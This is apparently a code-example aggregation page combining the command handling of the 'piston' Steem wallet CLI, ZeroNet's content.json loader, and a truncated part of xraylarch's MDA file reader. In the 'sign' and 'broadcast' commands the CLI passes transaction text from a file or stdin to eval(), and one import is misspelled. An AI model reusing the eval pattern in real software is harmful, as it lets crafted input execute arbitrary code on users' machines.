parser_transfer = subparsers.add_parser('transfer', help='Transfer STEEM')
parser_transfer.set_defaults(command="transfer")
parser_transfer.add_argument(
'to',
type=str,
help='Recepient'
)
parser_transfer.add_argument(
'amount',
type=float,
help='Amount to transfer'
)
parser_transfer.add_argument(
'asset',
type=str,
choices=["STEEM", "SBD"],
help='Asset to (i.e. STEEM or SDB)'
)
parser_transfer.add_argument(
'memo',
type=str,
nargs="?",
default="",
help='Optional memo'
)
parser_transfer.add_argument(
'--account',
type=str,
required=False,
default=config["default_author"],
help='Transfer from this account'
)
"""
Command "powerup"
"""
parser_powerup = subparsers.add_parser('powerup', help='Power up (vest STEEM as STEEM POWER)')
parser_powerup.set_defaults(command="powerup")
parser_powerup.add_argument(
'amount',
type=str,
help='Amount of VESTS to powerup'
)
parser_powerup.add_argument(
'--account',
type=str,
required=False,
default=config["default_author"],
help='Powerup from this account'
)
parser_powerup.add_argument(
'--to',
type=str,
required=False,
default=config["default_author"],
help='Powerup this account'
)
"""
Command "powerdown"
"""
parser_powerdown = subparsers.add_parser('powerdown', help='Power down (start withdrawing STEEM from STEEM POWER)')
parser_powerdown.set_defaults(command="powerdown")
parser_powerdown.add_argument(
'amount',
type=str,
help='Amount of VESTS to powerdown'
)
parser_powerdown.add_argument(
'--account',
type=str,
required=False,
default=config["default_author"],
help='powerdown from this account'
)
"""
Command "powerdownroute"
"""
parser_powerdownroute = subparsers.add_parser('powerdownroute', help='Setup a powerdown route')
parser_powerdownroute.set_defaults(command="powerdownroute")
parser_powerdownroute.add_argument(
'to',
type=str,
default=config["default_author"],
help='The account receiving either VESTS/SteemPower or STEEM.'
)
parser_powerdownroute.add_argument(
'--percentage',
type=float,
default=100,
help='The percent of the withdraw to go to the "to" account'
)
parser_powerdownroute.add_argument(
'--account',
type=str,
default=config["default_author"],
help='The account which is powering down'
)
parser_powerdownroute.add_argument(
'--auto_vest',
action='store_true',
help=('Set to true if the from account should receive the VESTS as'
'VESTS, or false if it should receive them as STEEM.')
)
"""
Command "convert"
"""
parser_convert = subparsers.add_parser('convert', help='Convert STEEMDollars to Steem (takes a week to settle)')
parser_convert.set_defaults(command="convert")
parser_convert.add_argument(
'amount',
type=float,
help='Amount of SBD to convert'
)
parser_convert.add_argument(
'--account',
type=str,
required=False,
default=config["default_author"],
help='Convert from this account'
)
"""
Command "balance"
"""
parser_balance = subparsers.add_parser('balance', help='Show the balance of one more more accounts')
parser_balance.set_defaults(command="balance")
parser_balance.add_argument(
'account',
type=str,
nargs="*",
default=config["default_author"],
help='balance of these account (multiple accounts allowed)'
)
"""
Command "history"
"""
parser_history = subparsers.add_parser('history', help='Show the history of an account')
parser_history.set_defaults(command="history")
parser_history.add_argument(
'account',
type=str,
nargs="?",
default=config["default_author"],
help='History of this account'
)
parser_history.add_argument(
'--limit',
type=int,
default=config["limit"],
help='Limit number of entries'
)
parser_history.add_argument(
'--memos',
action='store_true',
help='Show (decode) memos'
)
parser_history.add_argument(
'--first',
type=int,
default=99999999999999,
help='Transactioon numer (#) of the last transaction to show.'
)
parser_history.add_argument(
'--types',
type=str,
nargs="*",
default=[],
help='Show only these operation types'
)
"""
Command "interest"
"""
interest = subparsers.add_parser('interest', help='Get information about interest payment')
interest.set_defaults(command="interest")
interest.add_argument(
'account',
type=str,
nargs="*",
default=config["default_author"],
help='Inspect these accounts'
)
"""
Command "permissions"
"""
parser_permissions = subparsers.add_parser('permissions', help='Show permissions of an account')
parser_permissions.set_defaults(command="permissions")
parser_permissions.add_argument(
'account',
type=str,
nargs="?",
default=config["default_author"],
help='Account to show permissions for'
)
"""
Command "allow"
"""
parser_allow = subparsers.add_parser('allow', help='Allow an account/key to interact with your account')
parser_allow.set_defaults(command="allow")
parser_allow.add_argument(
'--account',
type=str,
nargs="?",
default=config["default_author"],
help='The account to allow action for'
)
parser_allow.add_argument(
'foreign_account',
type=str,
nargs="?",
help='The account or key that will be allowed to interact as your account'
)
parser_allow.add_argument(
'--permission',
type=str,
default="posting",
choices=["owner", "posting", "active"],
help=('The permission to grant (defaults to "posting")')
)
parser_allow.add_argument(
'--weight',
type=int,
default=None,
help=('The weight to use instead of the (full) threshold. '
'If the weight is smaller than the threshold, '
'additional signatures are required')
)
parser_allow.add_argument(
'--threshold',
type=int,
default=None,
help=('The permission\'s threshold that needs to be reached '
'by signatures to be able to interact')
)
"""
Command "disallow"
"""
parser_disallow = subparsers.add_parser('disallow', help='Remove allowance an account/key to interact with your account')
parser_disallow.set_defaults(command="disallow")
parser_disallow.add_argument(
'--account',
type=str,
nargs="?",
default=config["default_author"],
help='The account to disallow action for'
)
parser_disallow.add_argument(
'foreign_account',
type=str,
help='The account or key whose allowance to interact as your account will be removed'
)
parser_disallow.add_argument(
'--permission',
type=str,
default="posting",
choices=["owner", "posting", "active"],
help=('The permission to remove (defaults to "posting")')
)
parser_disallow.add_argument(
'--threshold',
type=int,
default=None,
help=('The permission\'s threshold that needs to be reached '
'by signatures to be able to interact')
)
"""
Command "newaccount"
"""
parser_newaccount = subparsers.add_parser('newaccount', help='Create a new account')
parser_newaccount.set_defaults(command="newaccount")
parser_newaccount.add_argument(
'accountname',
type=str,
help='New account name'
)
parser_newaccount.add_argument(
'--account',
type=str,
required=False,
default=config["default_author"],
help='Account that pays the fee'
)
"""
Command "importaccount"
"""
parser_importaccount = subparsers.add_parser('importaccount', help='Import an account using a passphrase')
parser_importaccount.set_defaults(command="importaccount")
parser_importaccount.add_argument(
'account',
type=str,
help='Account name'
)
"""
Command "updateMemoKey"
"""
parser_updateMemoKey = subparsers.add_parser('updatememokey', help='Update an account\'s memo key')
parser_updateMemoKey.set_defaults(command="updatememokey")
parser_updateMemoKey.add_argument(
'--account',
type=str,
nargs="?",
default=config["default_author"],
help='The account to updateMemoKey action for'
)
parser_updateMemoKey.add_argument(
'--key',
type=str,
default=None,
help='The new memo key'
)
"""
Command "sign"
"""
parser_sign = subparsers.add_parser('sign', help='Sign a provided transaction with available and required keys')
parser_sign.set_defaults(command="sign")
parser_sign.add_argument(
'--file',
type=str,
required=False,
help='Load transaction from file. If "-", read from stdin (defaults to "-")'
)
"""
Command "broadcast"
"""
parser_broadcast = subparsers.add_parser('broadcast', help='broadcast a signed transaction')
parser_broadcast.set_defaults(command="broadcast")
parser_broadcast.add_argument(
'--file',
type=str,
required=False,
help='Load transaction from file. If "-", read from stdin (defaults to "-")'
)
"""
Command "web"
"""
webconfig = subparsers.add_parser('web', help='Launch web version of piston')
webconfig.set_defaults(command="web")
webconfig.add_argument(
'--port',
type=int,
default=config["web:port"],
help='Port to open for internal web requests'
)
webconfig.add_argument(
'--host',
type=str,
default=config["web:host"],
help='Host address to listen to'
)
"""
Command "orderbook"
"""
orderbook = subparsers.add_parser('orderbook', help='Obtain orderbook of the internal market')
orderbook.set_defaults(command="orderbook")
orderbook.add_argument(
'--chart',
action='store_true',
help="Enable charting (requires matplotlib)"
)
"""
Command "buy"
"""
parser_buy = subparsers.add_parser('buy', help='Buy STEEM or SBD from the internal market')
parser_buy.set_defaults(command="buy")
parser_buy.add_argument(
'amount',
type=float,
help='Amount to buy'
)
parser_buy.add_argument(
'asset',
type=str,
choices=["STEEM", "SBD"],
help='Asset to buy (i.e. STEEM or SDB)'
)
parser_buy.add_argument(
'price',
type=float,
help='Limit buy price denoted in (SBD per STEEM)'
)
parser_buy.add_argument(
'--account',
type=str,
required=False,
default=config["default_account"],
help='Buy with this account (defaults to "default_account")'
)
"""
Command "sell"
"""
parser_sell = subparsers.add_parser('sell', help='Sell STEEM or SBD from the internal market')
parser_sell.set_defaults(command="sell")
parser_sell.add_argument(
'amount',
type=float,
help='Amount to sell'
)
parser_sell.add_argument(
'asset',
type=str,
choices=["STEEM", "SBD"],
help='Asset to sell (i.e. STEEM or SDB)'
)
parser_sell.add_argument(
'price',
type=float,
help='Limit sell price denoted in (SBD per STEEM)'
)
parser_sell.add_argument(
'--account',
type=str,
required=False,
default=config["default_account"],
help='Sell from this account (defaults to "default_account")'
)
"""
Parse Arguments
"""
args = parser.parse_args()
# Logging
log = logging.getLogger(__name__)
verbosity = ["critical",
"error",
"warn",
"info",
"debug"][int(min(args.verbose, 4))]
log.setLevel(getattr(logging, verbosity.upper()))
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch = logging.StreamHandler()
ch.setLevel(getattr(logging, verbosity.upper()))
ch.setFormatter(formatter)
log.addHandler(ch)
# GrapheneAPI logging
if args.verbose > 4:
verbosity = ["critical",
"error",
"warn",
"info",
"debug"][int(min((args.verbose - 4), 4))]
gphlog = logging.getLogger("graphenebase")
gphlog.setLevel(getattr(logging, verbosity.upper()))
gphlog.addHandler(ch)
if args.verbose > 8:
verbosity = ["critical",
"error",
"warn",
"info",
"debug"][int(min((args.verbose - 8), 4))]
gphlog = logging.getLogger("grapheneapi")
gphlog.setLevel(getattr(logging, verbosity.upper()))
gphlog.addHandler(ch)
if not hasattr(args, "command"):
parser.print_help()
sys.exit(2)
# We don't require RPC for these commands
rpc_not_required = [
"set",
"config",
"web",
""]
if args.command not in rpc_not_required and args.command:
options = {
"node": args.node,
"rpcuser": args.rpcuser,
"rpcpassword": args.rpcpassword,
"nobroadcast": args.nobroadcast,
"unsigned": args.unsigned,
"expires": args.expires
}
# preload wallet with empty keys
if args.nowallet:
options.update({"wif": []})
# Signing only requires the wallet, no connection
# essential for offline/coldstorage signing
if args.command == "sign":
options.update({"offline": True})
steem = SteemConnector(**options).getSteem()
if args.command == "set":
if (args.key in ["default_author",
"default_voter",
"default_account"] and
args.value[0] == "@"):
args.value = args.value[1:]
config[args.key] = args.value
elif args.command == "config":
t = PrettyTable(["Key", "Value"])
t.align = "l"
for key in config:
if key in availableConfigurationKeys: # hide internal config data
t.add_row([key, config[key]])
print(t)
elif args.command == "info":
t = PrettyTable(["Key", "Value"])
t.align = "l"
info = steem.rpc.get_dynamic_global_properties()
median_price = steem.rpc.get_current_median_history_price()
steem_per_mvest = (
float(info["total_vesting_fund_steem"].split(" ")[0]) /
(float(info["total_vesting_shares"].split(" ")[0]) / 1e6)
)
price = (
float(median_price["base"].split(" ")[0]) /
float(median_price["quote"].split(" ")[0])
)
for key in info:
t.add_row([key, info[key]])
t.add_row(["steem per mvest", steem_per_mvest])
t.add_row(["internal price", price])
print(t)
elif args.command == "changewalletpassphrase":
steem.wallet.changePassphrase()
elif args.command == "addkey":
pub = None
if len(args.wifkeys):
for wifkey in args.wifkeys:
pub = (steem.wallet.addPrivateKey(wifkey))
if pub:
print(pub)
else:
import getpass
wifkey = ""
while True:
wifkey = getpass.getpass('Private Key (wif) [Enter to quit]:')
if not wifkey:
break
pub = (steem.wallet.addPrivateKey(wifkey))
if pub:
print(pub)
if pub:
name = steem.wallet.getAccountFromPublicKey(pub)
print("Setting new default user: %s" % name)
print("You can change these settings with:")
print(" piston set default_author x")
print(" piston set default_voter x")
config["default_author"] = name
config["default_voter"] = name
elif args.command == "delkey":
if confirm(
"Are you sure you want to delete keys from your wallet?\n"
"This step is IRREVERSIBLE! If you don't have a backup, "
"You may lose access to your account!"
):
for pub in args.pub:
steem.wallet.removePrivateKeyFromPublicKey(pub)
elif args.command == "getkey":
print(steem.wallet.getPrivateKeyForPublicKey(args.pub))
elif args.command == "listkeys":
t = PrettyTable(["Available Key"])
t.align = "l"
for key in steem.wallet.getPublicKeys():
t.add_row([key])
print(t)
elif args.command == "listaccounts":
t = PrettyTable(["Name", "Type", "Available Key"])
t.align = "l"
for account in steem.wallet.getAccounts():
t.add_row([
account["name"] or "n/a",
account["type"] or "n/a",
account["pubkey"]
])
print(t)
elif args.command == "reply":
from textwrap import indent
parent = steem.get_content(args.replyto)
if parent["id"] == "0.0.0":
print("Can't find post %s" % args.replyto)
return
reply_message = indent(parent["body"], "> ")
post = frontmatter.Post(reply_message, **{
"title": args.title if args.title else "Re: " + parent["title"],
"author": args.author if args.author else "required",
"replyto": args.replyto,
})
meta, json_meta, message = yaml_parse_file(args, initial_content=post)
for required in ["author", "title"]:
if (required not in meta or
not meta[required] or
meta[required] == "required"):
print("'%s' required!" % required)
# TODO, instead of terminating here, send the user back
# to the EDITOR
return
pprint(steem.reply(
meta["replyto"],
message,
title=meta["title"],
author=meta["author"],
meta=json_meta,
))
elif args.command == "post" or args.command == "yaml":
initmeta = {
"title": args.title if args.title else "required",
"author": args.author if args.author else "required",
"category": args.category if args.category else "required",
}
if args.tags:
initmeta["tags"] = args.tags
post = frontmatter.Post("", **initmeta)
meta, json_meta, body = yaml_parse_file(args, initial_content=post)
if not body:
print("Empty body! Not posting!")
return
for required in ["author", "title", "category"]:
if (required not in meta or
not meta[required] or
meta[required] == "required"):
print("'%s' required!" % required)
# TODO, instead of terminating here, send the user back
# to the EDITOR
return
pprint(steem.post(
meta["title"],
body,
author=meta["author"],
category=meta["category"],
meta=json_meta,
))
elif args.command == "edit":
original_post = steem.get_content(args.post)
edited_message = None
if original_post["id"] == "0.0.0":
print("Can't find post %s" % args.post)
return
post = frontmatter.Post(original_post["body"], **{
"title": original_post["title"] + " (immutable)",
"author": original_post["author"] + " (immutable)",
"tags": original_post["_tags"]
})
meta, json_meta, edited_message = yaml_parse_file(args, initial_content=post)
pprint(steem.edit(
args.post,
edited_message,
replace=args.replace,
meta=json_meta,
))
elif args.command == "upvote" or args.command == "downvote":
post = Post(steem, args.post)
if args.command == "downvote":
weight = -float(args.weight)
else:
weight = +float(args.weight)
if not args.voter:
print("Not voter provided!")
return
pprint(post.vote(weight, voter=args.voter))
elif args.command == "read":
post_author, post_permlink = resolveIdentifier(args.post)
if args.parents:
# FIXME inconsistency, use @author/permlink instead!
dump_recursive_parents(
steem.rpc,
post_author,
post_permlink,
args.parents,
format=args.format
)
if not args.comments and not args.parents:
post = steem.get_content(args.post)
if post["id"] == "0.0.0":
print("Can't find post %s" % args.post)
return
if args.format == "markdown":
body = markdownify(post["body"])
else:
body = post["body"]
if args.full:
meta = {}
for key in post:
if key in ["steem", "body"]:
continue
meta[key] = post[key]
yaml = frontmatter.Post(body, **meta)
print(frontmatter.dumps(yaml))
else:
print(body)
if args.comments:
dump_recursive_comments(
steem.rpc,
post_author,
post_permlink,
format=args.format
)
elif args.command == "categories":
categories = steem.get_categories(
sort=args.sort,
begin=args.category,
limit=args.limit
)
t = PrettyTable(["name", "discussions", "payouts"])
t.align = "l"
for category in categories:
t.add_row([
category["name"],
category["discussions"],
category["total_payouts"],
])
print(t)
elif args.command == "list":
list_posts(
steem.get_posts(
limit=args.limit,
sort=args.sort,
category=args.category,
start=args.start
),
args.columns
)
elif args.command == "replies":
if not args.author:
print("Please specify an author via --author\n "
"or define your default author with:\n"
" piston set default_author x")
else:
discussions = steem.get_replies(args.author)
list_posts(discussions[0:args.limit])
elif args.command == "transfer":
pprint(steem.transfer(
args.to,
args.amount,
args.asset,
memo=args.memo,
account=args.account
))
elif args.command == "powerup":
pprint(steem.transfer_to_vesting(
args.amount,
account=args.account,
to=args.to
))
elif args.command == "powerdown":
pprint(steem.withdraw_vesting(
args.amount,
account=args.account,
))
elif args.command == "convert":
pprint(steem.convert(
args.amount,
account=args.account,
))
elif args.command == "powerdownroute":
pprint(steem.set_withdraw_vesting_route(
args.to,
percentage=args.percentage,
account=args.account,
auto_vest=args.auto_vest
))
elif args.command == "balance":
t = PrettyTable(["Account", "STEEM", "SBD", "VESTS", "VESTS (in STEEM)"])
t.align = "r"
if isinstance(args.account, str):
args.account = [args.account]
for a in args.account:
b = steem.get_balances(a)
t.add_row([
a,
b["balance"],
b["sbd_balance"],
b["vesting_shares"],
b["vesting_shares_steem"]
])
print(t)
elif args.command == "history":
t = PrettyTable(["#", "time/block", "Operation", "Details"])
t.align = "r"
if isinstance(args.account, str):
args.account = [args.account]
if isinstance(args.types, str):
args.types = [args.types]
for a in args.account:
for b in steem.rpc.account_history(
a,
args.first,
limit=args.limit,
only_ops=args.types
):
t.add_row([
b[0],
"%s (%s)" % (b[1]["timestamp"], b[1]["block"]),
b[1]["op"][0],
format_operation_details(b[1]["op"], memos=args.memos),
])
print(t)
elif args.command == "interest":
t = PrettyTable(["Account",
"Last Interest Payment",
"Next Payment",
"Interest rate",
"Interest"])
t.align = "r"
if isinstance(args.account, str):
args.account = [args.account]
for a in args.account:
i = steem.interest(a)
t.add_row([
a,
i["last_payment"],
"in %s" % strfage(i["next_payment_duration"]),
"%.1f%%" % i["interest_rate"],
"%.3f SBD" % i["interest"],
])
print(t)
elif args.command == "permissions":
account = steem.rpc.get_account(args.account)
print_permissions(account)
elif args.command == "allow":
if not args.foreign_account:
from steembase.account import PasswordKey
pwd = get_terminal(text="Password for Key Derivation: ", confirm=True)
args.foreign_account = format(PasswordKey(args.account, pwd, args.permission).get_public(), "STM")
pprint(steem.allow(
args.foreign_account,
weight=args.weight,
account=args.account,
permission=args.permission,
threshold=args.threshold
))
elif args.command == "disallow":
pprint(steem.disallow(
args.foreign_account,
account=args.account,
permission=args.permission,
threshold=args.threshold
))
elif args.command == "updatememokey":
if not args.key:
# Loop until both match
from steembase.account import PasswordKey
pw = get_terminal(text="Password for Memo Key: ", confirm=True, allowedempty=False)
memo_key = PasswordKey(args.account, pw, "memo")
args.key = format(memo_key.get_public_key(), "STM")
memo_privkey = memo_key.get_private_key()
# Add the key to the wallet
if not args.nobroadcast:
steem.wallet.addPrivateKey(memo_privkey)
pprint(steem.update_memo_key(
args.key,
account=args.account
))
elif args.command == "newaccount":
import getpass
while True :
pw = getpass.getpass("New Account Passphrase: ")
if not pw:
print("You cannot chosen an empty password!")
continue
else:
pwck = getpass.getpass(
"Confirm New Account Passphrase: "
)
if (pw == pwck) :
break
else :
print("Given Passphrases do not match!")
pprint(steem.create_account(
args.accountname,
creator=args.account,
password=pw,
))
elif args.command == "importaccount":
from steembase.account import PasswordKey
import getpass
password = getpass.getpass("Account Passphrase: ")
posting_key = PasswordKey(args.account, password, role="posting")
active_key = PasswordKey(args.account, password, role="active")
memo_key = PasswordKey(args.account, password, role="memo")
posting_pubkey = format(posting_key.get_public_key(), "STM")
active_pubkey = format(active_key.get_public_key(), "STM")
memo_pubkey = format(memo_key.get_public_key(), "STM")
account = steem.rpc.get_account(args.account)
imported = False
if active_pubkey in [x[0] for x in account["active"]["key_auths"]]:
active_privkey = active_key.get_private_key()
steem.wallet.addPrivateKey(active_privkey)
imported = True
if posting_pubkey in [x[0] for x in account["posting"]["key_auths"]]:
posting_privkey = posting_key.get_private_key()
steem.wallet.addPrivateKey(posting_privkey)
imported = True
if memo_pubkey == account["memo_key"]:
memo_privkey = memo_key.get_private_key()
steem.wallet.addPrivateKey(memo_privkey)
imported = True
if not imported:
print("No keys matched! Invalid password?")
elif args.command == "sign":
if args.file and args.file != "-":
if not os.path.isfile(args.file):
raise Exception("File %s does not exist!" % args.file)
with open(args.file) as fp:
tx = fp.read()
else:
tx = sys.stdin.read()
tx = eval(tx)
pprint(steem.sign(tx))
elif args.command == "broadcast":
if args.file and args.file != "-":
if not os.path.isfile(args.file):
raise Exception("File %s does not exist!" % args.file)
with open(args.file) as fp:
tx = fp.read()
else:
tx = sys.stdin.read()
tx = eval(tx)
steem.broadcast(tx)
elif args.command == "web":
SteemConnector(node=args.node,
rpcuser=args.rpcuser,
rpcpassword=args.rpcpassword,
nobroadcast=args.nobroadcast,
num_retries=1)
from . import web
web.run(port=args.port, host=args.host)
elif args.command == "orderbook":
if args.chart:
try:
import numpy
import Gnuplot
from itertools import accuemulate
except:
print("To use --chart, you need gnuplot and gnuplot-py installed")
sys.exit(1)
orderbook = steem.dex().returnOrderBook()
if args.chart:
g = Gnuplot.Gnuplot()
g.title("Steem internal market - SBD:STEEM")
g.xlabel("price")
g.ylabel("volume")
g("""
set style data line
set term xterm
set border 15
""")
xbids = [x["price"] for x in orderbook["bids"]]
ybids = list(accuemulate([x["sbd"] for x in orderbook["bids"]]))
dbids = Gnuplot.Data(xbids, ybids, with_="lines")
xasks = [x["price"] for x in orderbook["asks"]]
yasks = list(accuemulate([x["sbd"] for x in orderbook["asks"]]))
dasks = Gnuplot.Data(xasks, yasks, with_="lines")
g("set terminal dumb")
g.plot(dbids, dasks) # write SVG data directly to stdout ...
t = PrettyTable(["bid SBD", "sum bids SBD", "bid STEEM", "sum bids STEEM",
"bid price", "+", "ask price",
"ask STEEM", "sum asks steem", "ask SBD", "sum asks SBD"])
t.align = "r"
bidssteem = 0
bidssbd = 0
askssteem = 0
askssbd = 0
for i, o in enumerate(orderbook["asks"]):
bidssbd += orderbook["bids"][i]["sbd"]
bidssteem += orderbook["bids"][i]["steem"]
askssbd += orderbook["asks"][i]["sbd"]
askssteem += orderbook["asks"][i]["steem"]
t.add_row([
"%.3f Ṩ" % orderbook["bids"][i]["sbd"],
"%.3f ∑" % bidssbd,
"%.3f ȿ" % orderbook["bids"][i]["steem"],
"%.3f ∑" % bidssteem,
"%.3f Ṩ/ȿ" % orderbook["bids"][i]["price"],
"|",
"%.3f Ṩ/ȿ" % orderbook["asks"][i]["price"],
"%.3f ȿ" % orderbook["asks"][i]["steem"],
"%.3f ∑" % askssteem,
"%.3f Ṩ" % orderbook["asks"][i]["sbd"],
"%.3f ∑" % askssbd])
print(t)
elif args.command == "buy":
if args.asset == "SBD":
price = 1.0 / args.price
else:
price = args.price
pprint(steem.buy(
args.amount,
args.asset,
price,
account=args.account
))
elif args.command == "sell":
if args.asset == "SBD":
price = 1.0 / args.price
else:
price = args.price
pprint(steem.sell(
args.amount,
args.asset,
price,
account=args.account
))
else:
print("No valid command given")
0
Example 59
def loadContent(self, content_inner_path="content.json", add_bad_files=True, delete_removed_files=True, load_includes=True, force=False):
content_inner_path = content_inner_path.strip("/") # Remove / from beginning
old_content = self.contents.get(content_inner_path)
content_path = self.site.storage.getPath(content_inner_path)
content_dir = helper.getDirname(self.site.storage.getPath(content_inner_path))
content_inner_dir = helper.getDirname(content_inner_path)
if os.path.isfile(content_path):
try:
# Check if file is newer than what we have
if not force and old_content and not self.site.settings.get("own"):
for line in open(content_path):
if '"modified"' not in line:
continue
match = re.search("([0-9\.]+),$", line.strip(" \r\n"))
if match and float(match.group(1)) <= old_content.get("modified", 0):
self.log.debug("%s loadContent same json file, skipping" % content_inner_path)
return [], []
new_content = json.load(open(content_path))
except Exception, err:
self.log.warning("%s load error: %s" % (content_path, Debug.formatException(err)))
return [], []
else:
self.log.warning("Content.json not exist: %s" % content_path)
return [], [] # Content.json not exist
try:
# Get the files where the sha512 changed
changed = []
deleted = []
# Check changed
for relative_path, info in new_content.get("files", {}).iteritems():
if "sha512" in info:
hash_type = "sha512"
else: # Backward compatibility
hash_type = "sha1"
new_hash = info[hash_type]
if old_content and old_content["files"].get(relative_path): # We have the file in the old content
old_hash = old_content["files"][relative_path].get(hash_type)
else: # The file is not in the old content
old_hash = None
if old_hash != new_hash:
changed.append(content_inner_dir + relative_path)
# Check changed optional files
for relative_path, info in new_content.get("files_optional", {}).iteritems():
file_inner_path = content_inner_dir + relative_path
new_hash = info["sha512"]
if old_content and old_content.get("files_optional", {}).get(relative_path):
# We have the file in the old content
old_hash = old_content["files_optional"][relative_path].get("sha512")
if old_hash != new_hash and self.site.isDownloadable(file_inner_path):
changed.append(file_inner_path) # Download new file
elif old_hash != new_hash and self.hashfield.hasHash(old_hash) and not self.site.settings.get("own"):
try:
self.optionalRemove(file_inner_path, old_hash, old_content["files_optional"][relative_path]["size"])
self.site.storage.delete(file_inner_path)
self.log.debug("Deleted changed optional file: %s" % file_inner_path)
except Exception, err:
self.log.debug("Error deleting file %s: %s" % (file_inner_path, err))
else: # The file is not in the old content
if self.site.isDownloadable(file_inner_path):
changed.append(file_inner_path) # Download new file
# Check deleted
if old_content:
old_files = dict(
old_content.get("files", {}),
**old_content.get("files_optional", {})
)
new_files = dict(
new_content.get("files", {}),
**new_content.get("files_optional", {})
)
deleted = [key for key in old_files if key not in new_files]
if deleted and not self.site.settings.get("own"):
# Deleting files that no longer in content.json
for file_relative_path in deleted:
file_inner_path = content_inner_dir + file_relative_path
try:
self.site.storage.delete(file_inner_path)
# Check if the deleted file is optional
if old_content.get("files_optional") and old_content["files_optional"].get(file_relative_path):
old_hash = old_content["files_optional"][file_relative_path].get("sha512")
if self.hashfield.hasHash(old_hash):
self.optionalRemove(file_inner_path, old_hash, old_content["files_optional"][file_relative_path]["size"])
self.log.debug("Deleted file: %s" % file_inner_path)
except Exception, err:
self.log.debug("Error deleting file %s: %s" % (file_inner_path, err))
# Cleanup empty dirs
tree = {root: [dirs, files] for root, dirs, files in os.walk(self.site.storage.getPath(content_inner_dir))}
for root in sorted(tree, key=len, reverse=True):
dirs, files = tree[root]
if dirs == [] and files == []:
root_inner_path = self.site.storage.getInnerPath(root.replace("\\", "/"))
self.log.debug("Empty directory: %s, cleaning up." % root_inner_path)
try:
self.site.storage.deleteDir(root_inner_path)
# Remove from tree dict to reflect changed state
tree[os.path.dirname(root)][0].remove(os.path.basename(root))
except Exception, err:
self.log.debug("Error deleting empty directory %s: %s" % (root_inner_path, err))
# Check archived
if old_content and "user_contents" in new_content and "archived" in new_content["user_contents"]:
old_archived = old_content.get("user_contents", {}).get("archived", {})
new_archived = new_content.get("user_contents", {}).get("archived", {})
self.log.debug("old archived: %s, new archived: %s" % (len(old_archived), len(new_archived)))
archived_changed = {
key: date_archived
for key, date_archived in new_archived.iteritems()
if old_archived.get(key) != new_archived[key]
}
if archived_changed:
self.log.debug("Archived changed: %s" % archived_changed)
for archived_dirname, date_archived in archived_changed.iteritems():
archived_inner_path = content_inner_dir + archived_dirname + "/content.json"
if self.contents.get(archived_inner_path, {}).get("modified", 0) < date_archived:
self.removeContent(archived_inner_path)
self.site.settings["size"] = self.getTotalSize()
# Load includes
if load_includes and "includes" in new_content:
for relative_path, info in new_content["includes"].items():
include_inner_path = content_inner_dir + relative_path
if self.site.storage.isFile(include_inner_path): # Content.json exists, load it
include_changed, include_deleted = self.loadContent(
include_inner_path, add_bad_files=add_bad_files, delete_removed_files=delete_removed_files
)
if include_changed:
changed += include_changed # Add changed files
if include_deleted:
deleted += include_deleted # Add changed files
else: # Content.json not exist, add to changed files
self.log.debug("Missing include: %s" % include_inner_path)
changed += [include_inner_path]
# Load blind user includes (all subdir)
if load_includes and "user_contents" in new_content:
for relative_dir in os.listdir(content_dir):
include_inner_path = content_inner_dir + relative_dir + "/content.json"
if not self.site.storage.isFile(include_inner_path):
continue # Content.json not exist
include_changed, include_deleted = self.loadContent(
include_inner_path, add_bad_files=add_bad_files, delete_removed_files=delete_removed_files,
load_includes=False
)
if include_changed:
changed += include_changed # Add changed files
if include_deleted:
deleted += include_deleted # Add changed files
# Save some memory
new_content["signs"] = None
if "cert_sign" in new_content:
new_content["cert_sign"] = None
if new_content.get("files_optional"):
self.has_optional_files = True
# Update the content
self.contents[content_inner_path] = new_content
except Exception, err:
self.log.warning("Content.json parse error: %s" % Debug.formatException(err))
return [], [] # Content.json parse error
# Add changed files to bad files
if add_bad_files:
for inner_path in changed:
self.site.bad_files[inner_path] = self.site.bad_files.get(inner_path, 0) + 1
for inner_path in deleted:
if inner_path in self.site.bad_files:
del self.site.bad_files[inner_path]
if new_content.get("modified", 0) > self.site.settings.get("modified", 0):
# Dont store modifications in the far future (more than 10 minute)
self.site.settings["modified"] = min(time.time() + 60 * 10, new_content["modified"])
return changed, deleted
0
Example 60
Project: xraylarch Source File: mda.py
def readMDA(fname, maxdim=4, verbose=0, help=0):
dim = []
if (not os.path.isfile(fname)):
fname = fname + '.mda'
if (not os.path.isfile(fname)):
print(fname," is not a file")
return dim
file = open(fname, 'rb')
# to read header for scan of up to 5 dimensions
buf = file.read(100)
u = xdrlib.Unpacker(buf)
# read file header
version = u.unpack_float()
scan_number = u.unpack_int()
rank = u.unpack_int()
dimensions = u.unpack_farray(rank, u.unpack_int)
isRegular = u.unpack_int()
pExtra = u.unpack_int()
pmain_scan = file.tell() - (len(buf) - u.get_position())
# collect 1D data
file.seek(pmain_scan)
dim.append(readScan(file, max(0,verbose-1)))
dim[0].dim = 1
if ((rank > 1) and (maxdim > 1)):
# collect 2D data
for i in range(dim[0].curr_pt):
file.seek(dim[0].plower_scans[i])
if (i==0):
dim.append(readScan(file, max(0,verbose-1)))
dim[1].dim = 2
# replace data arrays [1,2,3] with [[1,2,3]]
for j in range(dim[1].np):
data = dim[1].p[j].data
dim[1].p[j].data = []
dim[1].p[j].data.append(data)
for j in range(dim[1].nd):
data = dim[1].d[j].data
dim[1].d[j].data = []
dim[1].d[j].data.append(data)
else:
s = readScan(file, max(0,verbose-1))
# append data arrays
# [ [1,2,3], [2,3,4] ] -> [ [1,2,3], [2,3,4], [3,4,5] ]
for j in range(s.np): dim[1].p[j].data.append(s.p[j].data)
for j in range(s.nd): dim[1].d[j].data.append(s.d[j].data)
if ((rank > 2) and (maxdim > 2)):
# collect 3D data
for i in range(dim[0].curr_pt):
file.seek(dim[0].plower_scans[i])
s1 = readScan(file, max(0,verbose-1))
for j in range(s1.curr_pt):
file.seek(s1.plower_scans[j])
if ((i == 0) and (j == 0)):
dim.append(readScan(file, max(0,verbose-1)))
dim[2].dim = 3
# replace data arrays [1,2,3] with [[[1,2,3]]]
for k in range(dim[2].np):
data = dim[2].p[k].data
dim[2].p[k].data = [[]]
dim[2].p[k].data[0].append(data)
for k in range(dim[2].nd):
data = dim[2].d[k].data
dim[2].d[k].data = [[]]
dim[2].d[k].data[0].append(data)
else:
s = readScan(file, max(0,verbose-1))
# append data arrays
# if j==0: [[[1,2,3], [2,3,4]]] -> [[[1,2,3], [2,3,4]], [[3,4,5]]]
# else: [[[1,2,3], [2,3,4]]] -> [[[1,2,3], [2,3,4]], [[3,4,5]]]
for k in range(s.np):
if j==0: dim[2].p[k].data.append([])
